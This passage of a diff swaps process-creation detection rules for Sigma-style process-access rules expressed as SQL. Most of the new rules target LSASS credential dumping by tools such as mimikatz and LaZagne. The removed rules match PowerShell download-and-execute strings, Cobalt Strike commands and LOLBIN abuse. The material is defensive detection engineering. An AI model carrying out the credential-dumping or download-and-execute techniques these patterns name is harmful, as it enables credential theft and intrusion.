Bousseaden, Michael Haag", "tags": [ - 
"attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "False positives are present when looking for 0x1410. Exclusions may be required." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + 
"attack.defense_evasion", + "attack.t1218.003", "attack.execution", - "attack.t1059.003" + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", - "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", + "status": "test", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND 
CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR 
CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "status": "experimental", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1068" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" 
+ "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE 
'\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspicious Driver Install by pnputil.exe", - "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", - "status": "test", - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Updaters and installers are typical false positives. 
Apply custom filters depending on your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND Image LIKE '%\\\\pnputil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND 
SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' 
ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage 
LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = 
'0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Use Of The SFTP.EXE Binary As A LOLBIN", - "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", - "status": "experimental", - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "status": "test", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_lolbin_sftp.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Use of VisualUiaVerifyNative.exe", - "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", - "status": "experimental", - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Legitimate testing of 
